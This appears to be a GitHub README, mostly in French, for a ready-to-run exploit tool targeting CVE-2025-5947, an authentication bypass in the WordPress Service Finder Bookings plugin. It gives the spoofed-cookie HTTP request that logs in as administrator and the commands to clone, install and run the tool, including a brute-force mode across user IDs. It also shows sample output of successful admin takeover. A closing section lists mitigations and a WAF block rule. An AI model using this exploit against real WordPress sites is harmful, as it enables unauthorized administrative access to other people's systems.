
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit
Outil d'exploitation pour la vulnérabilité de contournement d'authentification dans le plugin WordPress Service Finder Bookings ≤ 6.0
Une vulnérabilité critique de contournement d'authentification a été découverte dans le plugin WordPress Service Finder Bookings version 6.0 et antérieures.
| Caractéristique | Valeur |
|---|---|
| CVE ID | CVE-2025-5947 |
| Plugin | Service Finder Bookings (sf-booking) |
| Version affectée | ≤ 6.0 |
| Gravité | 🔴 CRITIQUE |
| Score CVSS | 9.8 |
| CWE | CWE-639 (Contournement d'autorisation) |
| Score EPSS | 0.617 (98.357 percentile) |
| Date de publication | 2025 |
Les attaquants non authentifiés peuvent :
La fonction service_finder_switch_back() présente une validation insuffisante des cookies :
// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
$user_id = $_COOKIE['original_user_id'];
wp_set_current_user($user_id);
// Doğrulama yok!
}
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1
Caractéristiques de l'attaque :
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947
pip install -r requirements.txt
python exploit.py -u http://target.com
# Afficher l'aide
python exploit.py -h
# Tenter de se connecter en tant qu'admin (ID=1)
python exploit.py -u http://target.com
# Avec un ID utilisateur spécifique
python exploit.py -u http://target.com -i 5
# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10
# Sans vérification SSL
python exploit.py -u http://target.com --no-ssl-verify
# Avec un timeout personnalisé
python exploit.py -u http://target.com -t 30
| Paramètre | Abréviation | Description | Par défaut |
|---|---|---|---|
--url | -u | URL cible (obligatoire) | - |
--user-id | -i | ID utilisateur | 1 |
--brute-force | -b | Plage de brute force (1-10) | - |
--no-ssl-verify | - | Désactiver la vérification SSL | False |
--timeout | -t | Timeout de la requête (secondes) | 10 |
python exploit.py -u http://wordpress.local
Sortie :
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu
🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
Location: http://wordpress.local/wp-admin/
Set-Cookie: wordpress_logged_in_abc123=...
✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/
python exploit.py -u http://target.com -b 1-20
Sortie :
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]
python exploit.py -u https://target.com --no-ssl-verify
Une exploitation réussie inclut les indicateurs suivants :
✅ Code de réponse HTTP 301 ou 302
✅ Présence de /wp-admin/ dans l'en-tête Location
✅ Présence de wordpress_logged_in_ dans l'en-tête Set-Cookie
Cet outil doit être utilisé uniquement :
L'auteur décline toute responsabilité.
Mise à jour urgente
# Mettre à jour depuis le panneau d'administration WordPress
# ou via WP-CLI
wp plugin update sf-booking
Désactiver le plugin
wp plugin deactivate sf-booking
Supprimer le plugin
wp plugin delete sf-booking
Pare-feu applicatif (WAF)
Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
Vérification de sécurité
Pour signaler des bugs ou suggérer des améliorations :
git checkout -b feature/improvement)git commit -am 'Add improvement')git push origin feature/improvement)Licence MIT - Consultez le fichier LICENSE pour plus de détails
Chercheur en sécurité
⭐ Si vous trouvez cela utile, mettez une étoile !